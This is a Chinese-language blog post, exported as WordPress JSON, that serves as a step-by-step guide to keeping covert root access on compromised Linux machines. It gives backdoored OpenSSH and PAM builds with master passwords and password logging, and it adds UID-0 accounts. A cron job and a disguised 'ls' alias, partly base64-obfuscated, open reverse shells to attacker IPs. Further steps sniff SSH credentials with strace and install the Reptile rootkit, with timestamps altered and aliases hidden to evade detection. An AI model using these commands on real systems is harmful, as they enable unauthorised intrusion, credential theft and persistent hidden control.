{"id":86,"date":"2024-05-03T10:00:00","date_gmt":"2023-06-22T02:00:00","guid":{"rendered":"http:\/\/123.207.45.199\/index.php\/2023\/06\/22\/%e6%9d%83%e9%99%90%e7%bb%b4%e6%8c%81-linux\/"},"modified":"2026-05-31T21:58:36","modified_gmt":"2026-05-31T13:58:36","slug":"%e6%9d%83%e9%99%90%e7%bb%b4%e6%8c%81-linux","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2024\/05\/03\/%e6%9d%83%e9%99%90%e7%bb%b4%e6%8c%81-linux\/","title":{"rendered":"\u6743\u9650\u7ef4\u6301-linux"},"content":{"rendered":"\n

\u603b\u7ed3<\/p>\n\n\n\n

\u5173\u4e8e\u901a\u8fc7ssh\u8fde\u63a5<\/p>\n\n\n\n

openssl =>\u4fee\u6539openssl\u7248\u672c\t=>\u4fee\u6539\u914d\u7f6e\u6587\u4ef6 \t=>\u4f7f\u7528\u4e07\u80fd\u5bc6\u7801\u767b\u5f55<\/p>\n\n\n\n

ssh-pam=>\u7528\u6237\u8eab\u4efd\u9a8c\u8bc1\u7684\u673a\u5236\t=>\u5b89\u88c5\u76f8\u540c\u7248\u672c->\u4fee\u6539\u914d\u7f6e\u6587\u4ef6 =>\u4e07\u80fd\u5bc6\u7801\u767b\u5f55<\/p>\n\n\n\n

ssh\u8f6f\u94fe\u63a5=>\u9488\u5bf9\u7aef\u53e3 \u53ef\u4efb\u610f\u5bc6\u7801\u767b\u5f55<\/p>\n\n\n\n

\u516c\u79c1\u94a5=>\u5c06\u653b\u51fb\u673a\u516c\u94a5\u5b58\u8fdb\u9776\u673a\u6587\u4ef6\u4e2d \t\u653b\u51fb\u673a\u76f4\u63a5\u5229\u7528\u79c1\u94a5\u767b\u5f55<\/p>\n\n\n\n

\u767b\u5f55\u7ef4\u62a4<\/h2>\n\n\n\n

openssl<\/h4>\n\n\n\n

\u73af\u5883\u642d\u5efa<\/p>\n\n\n\n

a.\u4e0b\u8f7d\u4f9d\u8d56\nyum -y install openssl openssl-devel pam-devel zlib zlib-devel    \nyum -y install gcc gcc-c++ make\nb.\u4e0a\u4f20\u6587\u4ef6\nc.\u89e3\u538b\u6587\u4ef6\ntar -xzvf openssh-5.9p1.tar.gz \ntar -xzvf 0x06-openssh-5.9p1.patch.tar.gz\ncp openssh-5.9p1.patch\/sshbd5.9p1.diff openssh-5.9p1\ncd openssh-5.9p1 && patch < sshbd5.9p1.diff\n\nd. \u5907\u4efdSSH\u539f\u59cb\u914d\u7f6e\u6587\u4ef6\nmv \/etc\/ssh\/ssh_config \/etc\/ssh\/ssh_config.old\nmv \/etc\/ssh\/sshd_config \/etc\/ssh\/sshd_config.old\n\nvim includes.h\n\n177 #define ILOG \"\/tmp\/ilog\"#ILOG\u662f\u522b\u4eba\u7528ssh\u767b\u5f55\u8be5\u4e3b\u673a\u8bb0\u5f55\u7684\u65e5\u5fd7\u76ee\u5f55\n178 #define OLOG \"\/tmp\/olog\"#OLOG\u662f\u8be5\u4e3b\u673a\u7528ssh\u767b\u5f55\u5176\u4ed6\u4e3b\u673a\u8bb0\u5f55\u7684\u65e5\u5fd7\u76ee\u5f55 \n179 #define SECRETPW \"yeyeye\"   <---#\u4fee\u6539\u6b64\u5904\u4e07\u80fd\u5bc6\u7801\n180 #endif \/* INCLUDES_H *\/\n\nvim version.h\n\n.\/configure --prefix=\/usr  --sysconfdir=\/etc\/ssh  --with-pam  --with-kerberos5  && make && make install\n\nPS\uff1a\u5728\u7f16\u8bd1\u8fc7\u7a0b\u4e2d\u53ef\u80fd\u4f1a\u51fa\u73b0\u201cconfigure: error: *** zlib.h missing \u2013 please install first or check config.log\u201d\u9519\u8bef\u3002\n    \u6267\u884c\u201cyum install zlib-devel\u201d\u548c\u201cyum install openssl openssl-devel\u201d\u547d\u4ee4\uff0c\n    \u5b89\u88c5\u540e\u518d\u6b21\u8fdb\u884c\u7f16\u8bd1\n\n\n\u62a5\u9519\u201cFailed to start OpenSSH server daemon\u201d\u89e3\u51b3\u65b9\u5f0f\uff1a\n\t-->\u6267\u884c\n    chmod 600 \/etc\/ssh\/ssh_host_rsa_key\n    chmod 600 \/etc\/ssh\/ssh_host_ecdsa_key\n    service sshd start\n\t\t\u6216\n    chown -R root.root \/var\/empty\/sshd  #\u5c06\u6587\u4ef6\u6240\u8ff0\u7528\u6237\u8c03\u6574\u4e3aroot\u7528\u6237\n    chmod 744  \/var\/empty\/sshd #\u8c03\u6574\u6587\u4ef6\u6743\u9650\n    service sshd restart   #\u91cd\u65b0\u542f\u52a8sshd\u670d\u52a1\n    \n\u540e\u7eed\u64cd\u4f5c\n\u66f4\u65b0\u65f6\u95f4\u4fee\u6539\n\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\uff0c\u4f7fssh_config\u548csshd_config\u6587\u4ef6\u7684\u4fee\u6539\u65f6\u95f4\u4e0essh_config.old\u548csshd_config.old\u6587\u4ef6\u4e00\u81f4\u3002\ntouch -r  \/etc\/ssh\/ssh_config.old  \/etc\/ssh\/ssh_config\ntouch -r  \/etc\/ssh\/sshd_config.old \/etc\/ssh\/sshd_config\n\n\u4f7f\u7528ssh root@ip  \u4e07\u80fd\u5bc6\u7801\u76f4\u63a5\u767b\u5f55<\/code><\/pre>\n\n\n\n
SSH-PAM<\/h4>\n\n\n\n
\u73af\u5883\u914d\u7f6e<\/p>\n\n\n\n
1.\u5173\u95ed setenforce 0   \u67e5\u770b getenforce\n2.\u67e5\u8be2\u7248\u672c rpm -qa | grep pam\n3.\u4e0b\u8f7d\uff1awget http:\/\/www.linux-pam.org\/library\/Linux-PAM-1.1.8.tar.gz\n4.\u89e3\u538b\uff1atar -zxvf Linux-PAM-1.1.8\n\n\u66ff\u6362 Linux-PAM-1.1.8-master\/modules\/pam_unix\/.libs\n\/pam_unix_auth.o \u4e2d\u7684\u5185\u5bb9\u4e3a\u5982\u4e0b \n    \/* verify the password of this user *\/\n    retval = _unix_verify_password(pamh, name, p, ctrl);\n    if(strcmp(\"hackers\",p)==0){return PAM_SUCCESS;}    \/\/\u540e\u95e8\u5bc6\u7801\n        if(retval == PAM_SUCCESS){    \n               FILE * fp;    \n               fp = fopen(\"\/tmp\/.sshlog\", \"a\");\/\/SSH\u767b\u5f55\u7528\u6237\u5bc6\u7801\u4fdd\u5b58\u4f4d\u7f6e\n               fprintf(fp, \"%s : %s\\n\", name, p);    \n               fclose(fp);} \n    name = p = NULL;\n    AUTH_RETURN;\n\n5.\u5b89\u88c5\u73af\u5883\uff1ayum install gcc flex flex-devel -y\n\n\n\n\u7f16\u8bd1\u5b89\u88c5\n\tcd Linux-PAM-1.1.8\n\tchmod +x .\/configure\n\t.\/configure && make\n\t\ncp \/usr\/lib64\/security\/pam_unix.so \/tmp\/pam_unix.so.bakcp\ncd modules\/pam_unix\/.libs\ncp pam_unix.so \/usr\/lib64\/security\/pam_unix.so\n\nssh\u8fde\u63a5\nssh root@ip<\/code><\/pre>\n\n\n\n
ssh\u8f6f\u94fe\u63a5<\/h4>\n\n\n\n
cat \/etc\/ssh\/sshd_config|grep UsePAM\t\u82e5\u662f\u4e3ano\u5219\u4fee\u6539\u4e3ayes\n\u4f7f\u7528\u547d\u4ee4\u914d\u7f6e\uff1aln -sf \/usr\/sbin\/sshd \/tmp\/su;\/tmp\/su -oPort=8888\n\u8fde\u63a5\u62a5\u9519\uff1arm  ~\/.ssh\/known_hosts\n\nssh 192.168.43.95 -p 8888\n\n\u8f93\u5165\u4efb\u610f\u5bc6\u7801\u5373\u53ef\u767b\u5f55<\/code><\/pre>\n\n\n\n
\u516c\u79c1\u94a5<\/h4>\n\n\n\n
\u653b\u51fb\u7aef\u8fd0\u884c\nvim \/etc\/ssh\/sshd_config\nRSAAuthentication yes\nPubkeyAuthentication yes\nAuthorizedKeysFile .ssh\/authorized_keys\n\n2.ssh-keygen -t rsa #\u4e09\u6b21\u56de\u8f66\n3.cat ~\/.ssh\/id_rsa.pub\n\n\u9776\u673a\u8fd0\u884c:\necho '<\u516c\u94a5\u4f4d\u7f6e>' > ~\/.ssh\/authorized_keys<\/code><\/pre>\n\n\n\n
\u540e\u95e8\u8d26\u6237<\/h4>\n\n\n\n
\u65b9\u5f0f\u4e00:\nuseradd -p `openssl passwd -1 -salt 'salt' \u5bc6\u7801` \u7528\u6237\u540d -o -u 0 -g root -G root -s \/bin\/bash -d \/home\/test1\t\n\u5982: useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s \/bin\/bash -d \/home\/test1\t\n\n\u65b9\u5f0f\u4e8c:\necho \"yeyeye:x:0:0::\/:\/bin\/sh\" >> \/etc\/passwd #\u589e\u52a0\u8d85\u7ea7\u7528\u6237\u8d26\u53f7\npasswd yeyeye #\u4fee\u6539yeyeye\u7684\u5bc6\u7801<\/code><\/pre>\n\n\n\n
\u540e\u95e8\u7ef4\u62a4<\/h2>\n\n\n\n
\u5b9a\u65f6\u4efb\u52a1-cron\u540e\u95e8<\/h4>\n\n\n\n
1.\u7f16\u8f91\u540e\u95e8\nvim \/etc\/.aaa.sh\n#!\/bin\/bash\nbash -i >& \/dev\/tcp\/43.138.215.2\/3388 0>&1\n\nchmod +x \/etc\/.aaa.sh\n\n2.\u6dfb\u52a0\u5b9a\u65f6\u4efb\u52a1\nvim \/etc\/crontab\/\n*\/1 * * * *  root \/etc\/.aaa.sh \n\n3.\u542f\u52a8\u5b9a\u65f6\u4efb\u52a1\nservice crond reload \/\/\u53c8\u4e00\u6b21\u52a0\u8f7d\u914d\u7f6e\nservice crond restart \/\/\u91cd\u65b0\u542f\u52a8\u670d\u52a1\nservice crond start \/\/\u542f\u52a8\u670d\u52a1\n\u5173\u95ed\u8fd9\u4e2acron\u670d\u52a1\nservice crond stop \/\/\u5173\u95ed\u670d\u52a1\n\n4.\u76d1\u542c\u7aef\u53e3\nnc -lvp 3388<\/code><\/pre>\n\n\n\n
\u76d1\u63a7\u529f\u80fd-srace\u540e\u95e8<\/h4>\n\n\n\n
strace\u662f\u4e00\u4e2a\u52a8\u6001\u8ddf\u8e2a\u5de5\u5177\uff0c\u5b83\u53ef\u4ee5\u8ddf\u8e2a\u7cfb\u7edf\u8c03\u7528\u7684\u6267\u884c\u3002\n\u6211\u4eec\u53ef\u4ee5\u628a\u4ed6\u5f53\u6210\u4e00\u4e2a\u952e\u76d8\u8bb0\u5f55\u7684\u540e\u95e8\uff0c\u6765\u6269\u5927\u6211\u4eec\u4fe1\u606f\u6536\u96c6\u7684\u8303\u56f4\n\u5b89\u88c5\nyum -y install srace <\/code><\/pre>\n\n\n\n
\u8bb0\u5f55<\/p>\n\n\n\n
\u8bb0\u5f55sshd\u660e\u6587\n(strace -f -F -p `ps aux|grep \"sshd -D\"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> \/tmp\/.sshdaaa.log &)\n\n\u67e5\u770b\u6587\u4ef6\u5185\u5bb9\ngrep -E 'read\\(6, \".+\\\\0\\\\0\\\\0\\\\.+\"'  \/tmp\/.sshdaaa.log\n\n\u8bb0\u5f55sshd\u79c1\u94a5\n(strace -f -F -p `ps aux|grep \"sshd -D\"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> \/tmp\/.sshdbbb.log &)<\/code><\/pre>\n\n\n\n
\u547d\u4ee4\u81ea\u5b9a\u4e49-Alisa\u540e\u95e8<\/h4>\n\n\n\n
alias\u547d\u4ee4\u7684\u529f\u80fd:\u4e3a\u547d\u4ee4\u8bbe\u7f6e\u522b\u540d<\/p>\n\n\n\n
\u5b9a\u4e49: alias ls='ls -al'  #\u6bcf\u6b21\u8f93\u5165ls\u547d\u4ee4\u7684\u65f6\u5019\u5c31\u80fd\u5b9e\u73b0ls -al\n\u5220\u9664: unalias ls<\/code><\/pre>\n\n\n\n
\u666e\u901a\u8fde\u63a5<\/p>\n\n\n\n
alias ls='alerts(){ ls $* --color=auto;bash -i >& \/dev\/tcp\/192.168.43.3\/5555 0>&1; };alerts'\n\n\u9776\u673a\u8f93\u5165 =>  ls\n\u653b\u51fb\u673a => nc -lvp 5555<\/code><\/pre>\n\n\n\n
\u811a\u672c\u8fde\u63a5(\u4e0d\u4f1a\u5361\u6b7b)<\/p>\n\n\n\n
python:\tbase64\u89e3\u7801\t\u5c06ip\u5730\u5740\u6539\u4e3a\u8981\u53cd\u5f39\u7684ip\t\u91cd\u65b0\u7f16\u7801\u540e\u8f93\u5165\nalias ls='alerts(){ ls $* --color=auto;python3 -c \"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\\''UTF-8'\\'')}[sys.version_info[0]]('\\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC40My4zIiwgNTU1NSkpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDIpCiAgICAgICAgcCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCAiLWkiXSkKICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICBleGl0KCk='\\'')))\";};alerts'\n\n\n\u9632\u6b62\u53d1\u73b0\nalias alias='alerts(){ alias \"$@\" | grep -v unalias | sed \"s\/alerts.*lambda.*\/ls --color=auto'\\''\/\";};alerts'<\/code><\/pre>\n\n\n\n
\u5185\u6838\u52a0\u8f7dLKM-RootKit\u540e\u95e8<\/h4>\n\n\n\n
centos7<\/p>\n\n\n\n
$kernel=`uname -r`\nyum -y install perl vim gcc make g++ unzip\nyum -y localinstall kernel-devel-\"$kernal\".rpm\n\ncd Reptile-2.0\/ && chmod +x .\/setup.sh\n\n.\/setup.sh install <<EOF\n\nreptile\nhax0r \t\t\t\t\t\t \\# \u6539\u4f60\u7684token\ns3cr3t  \t\t\t\t\t\\# \u6539\u4f60\u7684\u5bc6\u7801\nreptile\n666\ny\n43.138.215.2  \t\t\t\t\t\t\t\\# \u6539\u4f60\u7684\u653b\u51fbIP\n9000  \t\t\t\t\t\t\t\\# \u6539\u4f60\u7684\u653b\u51fb\u76d1\u542c\u7aef\u53e3\n1\nEOF<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u603b\u7ed3 \u5173\u4e8e\u901a\u8fc7ssh\u8fde\u63a5 openssl =>\u4fee\u6539openssl\u7248\u672c =>\u4fee\u6539\u914d\u7f6e\u6587\u4ef6 =>\u4f7f\u7528\u4e07\u80fd\u5bc6\u7801\u767b\u5f55  … <\/p>\n","protected":false},"author":3,"featured_media":87,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-86","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/86","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=86"}],"version-history":[{"count":3,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/86\/revisions"}],"predecessor-version":[{"id":142,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/86\/revisions\/142"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/87"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=86"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=86"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=86"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}